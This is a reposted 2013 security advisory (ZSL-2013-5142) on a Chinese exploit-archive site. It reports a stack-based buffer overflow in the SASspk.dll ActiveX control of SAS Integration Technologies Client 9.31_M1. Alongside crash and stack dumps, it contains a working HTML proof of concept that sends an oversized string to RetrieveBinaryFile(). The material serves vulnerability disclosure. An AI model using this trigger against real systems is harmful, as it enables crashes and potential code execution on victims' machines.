首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
SAS Integration Technologies Client 9.31_M1 Buffer Overflow
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2013-05-27  
<!--

SAS Integration Technologies Client 9.31_M1 (SASspk.dll) Stack-based Overflow


Vendor: SAS Institute Inc.
Product web page: http://www.sas.com
Affected version: Deployment Manager 9.3.0.0 (Model 12.05, TS1M2)
                  SAS Integration Technologies Client 9.31_M1

Summary: SAS Integration Technologies provides you with software that
enables you to build a secure client/server infrastructure on which to
implement SAS distributed processing solutions. With SAS Integration
Technologies, you can integrate SAS with other applications in your
enterprise; provide proactive delivery of information from SAS throughout
the enterprise; extend the capabilities of SAS to meet your organization's
specific needs; and develop your own distributed applications that leverage
the analytic and reporting powers of SAS. The SAS Deployment Manager is
used for post-installation configuration tasks such as configuring some
products, applying hot fixes, updating metadata, and uninstalling SAS
software.

Desc: The SASspk module (SASspk.dll) version 9.310.0.11307, has a
function called 'RetrieveBinaryFile()' which has one parameter called
'bstrFileName' which takes arguments as strings as defined in the
function itself as ISPKBinaryFile from the SASPackageRetrieve library.
Stack-based buffer overflow was discovered in one of the fuzzing
processes that could allow arbitrary code execution by an attacker
when exploiting the non-sanitized 'bstrFileName' parameter.


======================================================================

ArgDump:
--------------------------------------------------
EBP+8  007EA404 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0016EB30 -> 00000000
EBP+16  00940E68 -> BAADF00D
EBP+20  41414141
EBP+24  41414141
EBP+28  41414141


Stack Dump:
--------------------------------------------------
1699E0 60 0E 94 00 00 00 00 00 01 00 00 00 60 0E 94 00  [`...........`...]
1699F0 30 28 00 00 00 00 00 00 00 00 00 00 E4 EA 16 00  [................]
169A00 33 DF 4D 00 04 A4 7E 00 30 EB 16 00 68 0E 94 00  [..M.........h...]
169A10 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
169A20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]

======================================================================


Tested on: Microsoft Windows 7 Ultimate SP1 EN (32/64bit)
           Microsoft Windows 7 Enterprise EN (32/64bit)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5142
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5142.php


20.04.2013

-->


<html>
<title>SAS Integration Technologies Client ActiveX Stack BoF 0-day</title>
<body>
<object id='smash' classid='clsid:DDF47362-6319-11D4-87C0-00C04F48BC53' />
<script>

function run()
{
  targetFile = "C:\Program Files\SASHome\x86\Integration Technologies\SASspk.dll"
  prototype  = "Function RetrieveBinaryFile ( ByVal bstrFileName As String ) As ISPKBinaryFile"
  memberName = "RetrieveBinaryFile"
  progid     = "SASPackageRetrieve.SPKRetrieve"
  argCount   = 1
  arg1=String(5140, "A")
  smash.RetrieveBinaryFile arg1
}

</script><center><br /><br />
<input language=JavaScript onclick=run() type=button value="Test">
</center>
</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nginx HTTP Server 1.3.9-1.4.0
·Show In Browser 0.0.3 Ruby Gem
·AdobeCollabSync Buffer Overflo
·SIEMENS Solid Edge ST4 WebPart
·Analysis of nginx 1.3.9/1.4.0
·SIEMENS Solid Edge ST4 SEListC
·CompatUI ActiveX Control <= Re
·win32k!EPATHOBJ::pprFlattenRec
·HP LaserJet Pro P1606dn Passwo
·Linksys WRT160nv2 apply.cgi Re
·CodeBlocks 12.11 (Mac OS X) -
·Ophcrack 3.5.0 - Local Code Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved